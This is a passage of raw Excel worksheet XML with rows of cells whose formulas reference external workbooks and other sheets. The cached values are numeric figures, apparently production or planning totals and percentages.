        <f>'[11]7'!$U$69</f>
        <v>43.047619047619</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]7'!$V$69</f>
        <v>67.8543499511241</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]7'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]7'!$R$69</f>
        <v>72.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]7'!$S$69</f>
        <v>5553.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'6'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'6'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]7'!$W$104</f>
        <v>28.6470496652655</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]7'!$X$104</f>
        <v>28.3086870098949</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]7'!$Y$104</f>
        <v>26.0212822708374</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]7'!$T$104</f>
        <v>100</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]7'!$U$104</f>
        <v>100</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]7'!$V$104</f>
        <v>65.1032502443793</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]7'!$Q$104</f>
        <v>24</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]7'!$R$104</f>
        <v>168</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]7'!$S$104</f>
        <v>5328.05</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'6'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'6'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]7'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]7'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]7'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]7'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]7'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]7'!$V$105</f>
        <v>34.2641984359726</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]7'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]7'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]7'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'6'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'6'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]7'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]7'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]7'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]7'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]7'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]7'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]7'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]7'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]7'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]7'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]7'!$E$16</f>
        <v>2904</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'6'!H31</f>
        <v>25754</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1398761</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]7'!$I$16</f>
        <v>5917.59</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'6'!K31</f>
        <v>35593.25</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1391641.38</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]7'!$L$16</f>
        <v>55590.12</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>74.12016</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'[11]7'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]7'!$E$13</f>
        <v>6348</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'6'!H32</f>
        <v>21092</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1548935</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]7'!$I$13</f>
        <v>2336</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'6'!K32</f>
        <v>19520</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1040998</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]7'!$L$13</f>
        <v>61342.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>122.685232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]7'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]7'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]7'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]7'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]7'!$U$76</f>
        <v>3.57142857142857e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]7'!$V$76</f>
        <v>4.10557184750733e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]7'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]7'!$R$76</f>
        <v>6e-11</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]7'!$S$76</f>
        <v>3.36e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]7'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'6'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]7'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'6'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]7'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]7'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]7'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]7'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]7'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]7'!$U$77</f>
        <v>5.95238095238095e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]7'!$V$77</f>
        <v>61.825757575759</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]7'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]7'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]7'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]7'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'6'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]7'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'6'!K34</f>
        <v>666.89</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467869.82</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]7'!$L$15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'[11]7'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'6'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]7'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'6'!K35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G36+'6'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'6'!K36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G37+'6'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'6'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]7'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]7'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]7'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'6'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]7'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'6'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]7'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'6'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'6'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]7'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]7'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]7'!$R$10</f>
        <v>775.58</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'6'!U38</f>
        <v>4937.38</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264077.1</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]7'!$V$10</f>
        <v>805</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'6'!X38</f>
        <v>5686</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>261793</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]7'!$Y$10</f>
        <v>8896.711</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'6'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'6'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]7'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]7'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]7'!$R$50</f>
        <v>409.66</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'6'!U39</f>
        <v>2154.18</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>80967.779</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]7'!$V$50</f>
        <v>320</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'6'!X39</f>
        <v>2208</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>80967</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]7'!$Y$50</f>
        <v>1177.726</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'6'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'6'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]7'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]7'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]7'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]7'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]7'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]7'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]7'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]7'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]7'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]7'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]7'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'6'!H41</f>
        <v>2156</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>127132</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]7'!$I$16</f>
        <v>456.65</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'6'!K41</f>
        <v>2693.17</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>124086.71</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]7'!$L$16</f>
        <v>25592.59</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>85.3086333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]7'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]7'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]7'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'6'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]7'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'6'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]7'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]7'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]7'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'6'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]7'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'6'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]7'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]7'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]7'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]7'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'6'!U42</f>
        <v>2592.9</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>210179.87</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]7'!$V$8</f>
        <v>873</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'6'!X42</f>
        <v>2856</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>205327</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]7'!$Y$8</f>
        <v>8215.736</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]7'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]7'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'6'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]7'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'6'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]7'!$L$14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'[12]7'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'6'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]7'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'6'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]7'!$L$15</f>
        <v>65896.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]7'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]7'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]7'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'6'!U44</f>
        <v>1368.84</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>66122.008</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]7'!$V$29</f>
        <v>119</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'6'!X44</f>
        <v>1033</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>67443</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]7'!$Y$29</f>
        <v>2635.297</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]7'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'6'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]7'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'6'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]7'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]7'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]7'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]7'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]7'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]7'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]7'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]7'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]7'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'6'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'6'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]7'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]7'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]7'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'6'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]7'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'6'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]7'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'6'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
